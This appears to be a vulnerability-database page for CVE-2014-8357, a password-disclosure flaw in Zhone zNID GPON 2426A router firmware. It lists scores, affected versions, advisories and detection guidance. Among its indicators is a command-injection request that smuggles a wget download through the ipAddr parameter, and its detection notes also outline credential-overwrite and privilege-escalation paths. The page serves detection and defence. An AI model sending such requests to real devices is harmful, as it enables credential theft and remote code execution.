CVE-2014-8357
published 2017-10-17CVE-2014-8357: backupsettings.html in the web administrative portal in Zhone zNID GPON 2426A before S3.0.501 places a session key in a URL, which allows remote attackers to…
PriorityP273high8.8CVSS 3.0
AVNACLPRLUINSUCHIHAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
5.44%
91.7th percentile
backupsettings.html in the web administrative portal in Zhone zNID GPON 2426A before S3.0.501 places a session key in a URL, which allows remote attackers to obtain arbitrary user passwords via the sessionKey parameter in a getConfig action to backupsettings.conf.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| dasanzhone | znid_2426a_firmware | < s3.0.501 | s3.0.501 |
Detection & IOCsextracted from sources · hover to see the quote
command/zhnping.cmd?&test=traceroute&sessionKey=985703201&ipAddr=192.168.1.1|wget%20http://192.168.1.17/l00per_was_here&ttl=30&wait=3&queries=3↗
- →Detect GET requests to /backupsettings.conf with 'action=getConfig' and a 'sessionKey' parameter — this is the core exploit path for CVE-2014-8357 password disclosure. ↗
- →Monitor for the sessionKey parameter appearing in HTTP request URLs (not just POST bodies), indicating session token leakage via Referer or logs. ↗
- →Detect command injection attempts via the 'ipAddr' parameter in requests to /zhnping.cmd, particularly pipe characters followed by OS commands (e.g., '|wget'). ↗
- →Alert on POST requests to /uploadsettings.cgi with multipart/form-data containing a file named 'backupsettings.conf', which can be used to overwrite admin credentials. ↗
- →Detect access to /menuBcm.js followed by manipulation of its response (e.g., via proxy interception replacing 'admin' with a low-privilege username) as an indicator of privilege escalation (CVE-2014-8356). ↗
- →Detect stored XSS payloads in GET requests to /zhnsystemconfig.cgi via the snmpSysName, snmpSysLocation, or snmpSysContact parameters (e.g., presence of '<script>' tags). ↗
- ·Passwords in the backup configuration file are Base64-encoded, not encrypted — any attacker retrieving backupsettings.conf can trivially decode all credentials. ↗
- ·Access control on the Zhone web portal is enforced client-side via JavaScript only; server-side authorization is absent, meaning any authenticated low-privilege user can reach admin functions by manipulating JS responses. ↗
- ·The vulnerability affects Zhone zNID GPON 2426A firmware before S3.0.501; the exploit-db advisory recommends upgrading to S3.1.241 for full remediation of all reported issues. ↗
CVSS provenance
nvdv3.08.8HIGHCVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvdv2.04.0MEDIUMAV:N/AC:L/Au:S/C:P/I:N/A:N
vulncheck8.8HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-33rm-chj2-wr75: backupsettings
ghsa_unreviewed·2022-05-14
CVE-2014-8357 [HIGH] GHSA-33rm-chj2-wr75: backupsettings
backupsettings.html in the web administrative portal in Zhone zNID GPON 2426A before S3.0.501 places a session key in a URL, which allows remote attackers to obtain arbitrary user passwords via the sessionKey parameter in a getConfig action to backupsettings.conf.
VulnCheck
Zhone zNID GPON 2426A backupsettings.html Vulnerability
vulncheck·2014·CVSS 8.8
CVE-2014-8357 [HIGH] Zhone zNID GPON 2426A backupsettings.html Vulnerability
Zhone zNID GPON 2426A backupsettings.html Vulnerability
backupsettings.html in the web administrative portal in Zhone zNID GPON 2426A before S3.0.501 places a session key in a URL, which allows remote attackers to obtain arbitrary user passwords via the sessionKey parameter in a getConfig action to backupsettings.conf.
Affected: dasanzhone znid_2426a_firmware
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://blog.netlab.360.com/men-sheng-fa-da-cai-fodchajiang-shi-wang-luo/
No detection rules found.
No writeups or analysis indexed.
http://packetstormsecurity.com/files/133921/Zhone-Insecure-Reference-Password-Disclosure-Command-Injection.htmlhttp://seclists.org/fulldisclosure/2015/Oct/57http://www.securityfocus.com/archive/1/536663/100/0/threadedhttps://www.exploit-db.com/exploits/38453/http://packetstormsecurity.com/files/133921/Zhone-Insecure-Reference-Password-Disclosure-Command-Injection.htmlhttp://seclists.org/fulldisclosure/2015/Oct/57http://www.securityfocus.com/archive/1/536663/100/0/threadedhttps://www.exploit-db.com/exploits/38453/
2017-10-17
Published
Exploited in the wild